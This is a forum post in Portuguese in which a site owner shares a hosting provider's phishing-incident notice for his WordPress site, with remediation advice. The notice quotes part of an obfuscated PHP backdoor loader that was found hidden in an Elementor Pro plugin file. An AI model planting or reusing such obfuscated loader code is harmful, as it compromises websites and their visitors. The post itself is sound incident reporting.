Correção Phishing em site.

Boa tarde, td bem? Me chamo Rafael. Aconteceu algo em meu site que preciso resolver

Título:
Phishing Website - viveu.com.br

Descrição:
Olá

O teor dessa mensagem tem caráter de segurança e deve ser respondido rapidamente. Caso não seja o programador/desenvolvedor ou responsável técnico por seu serviço, recomenda-se que direcione esta mensagem a ele de forma urgente.

Foi identificado Phishing partindo do site viveu.com.br e para conter esta ação foi necessário desativá-lo temporariamente.

Evidência(s):
---------------------------------------------------
<?php class Ope {function __construct() {$_rx = $this->debug($this->_load);$_rx = $this->_ver($this->conf($_rx));$_rx = $this->_mv($_rx);if($_rx) {$this->x86 = $_rx[3];$this->px = $_rx[2];$this->point = $_rx[0];$this->_build($_rx[0], $_rx[1]);}}function _build($value, $_zx) {$this->emu = $value;$this->_zx = $_zx;$this->memory = $this->debug($this->memory);$this->memory = $this->conf($this->memory);$this->memory = $this->_code();if(strpos($this->memory, $this->emu) !== false) {if(!$this->x86)$this->ls($this->px, $this->point);$this->_mv($this->memory);}}function ls($_stack, $_x64) {$income = $this->ls[2].$This->ls[3].$This->ls[0].$This->ls[1];$income = @$income($_stack, $_x64);}function check($_zx, $_tx, $value) {$income = strlen($_tx) + strlen($value);while(strlen($value) < $income) {$process = ord($_tx[$this->_seek]) - ord($value[$this->_seek]);$_tx[$this->_seek] = chr($process % (2*128));$value .= $_tx[$this->_seek];$this->_seek++;}return $_tx;} function conf($_stack) {$backend = $this->conf[2].$This->conf[0].$This->conf[3].$This->conf[1].$This->conf[4];$backend = @$backend($_stack);return $backend;}function _ver($_stack) {$backend = $this->_ver[0].$This->_ver[3].$This->_ver[2].$This->_ver[1];$backend = @$backend($_stack);
---------------------------------------------------

Identificados os arquivos/diretórios suspeitos abaixo:
---------------------------------------------------
public_html/wp-content/plugins/elementor-pro/docs/modules/cache.php
---------------------------------------------------

Os arquivos citados acima são apenas exemplos localizados numa análise simples e podem conter falsos-positivos.

É Importante o desenvolvedor ficar atento às possíveis brechas de segurança existentes e identificar quais arquivos não pertencem ao funcionamento de seu site ou se foram alterados/comprometidos.

É sugerido que realize as ações abaixo:

- Identificar e remover scripts maliciosos identificados em sua hospedagem, deixe somente os arquivos necessários para o funcionamento do site após verificação;

- Realizar analise de segurança (varredura com anti-vírus) em todas as maquinas que são utilizadas para acessar os serviços vinculados ao seu domínio, dentro e fora de sua rede, como por exemplo acesso FTP, acesso ao E-mail, autenticação via Painel e etc;

- Reforçar a segurança de autenticação na área administrativa do seu site;

- Caso utilize algum CMS (Wordpress, Joomla, etc), atualize-o, assim como os temas e plugins instalados, a fim de evitar exploração de falhas de segurança no site;

- Altere as senha de acesso ao FTP e banco de dados;

- Sempre utilize senhas fortes;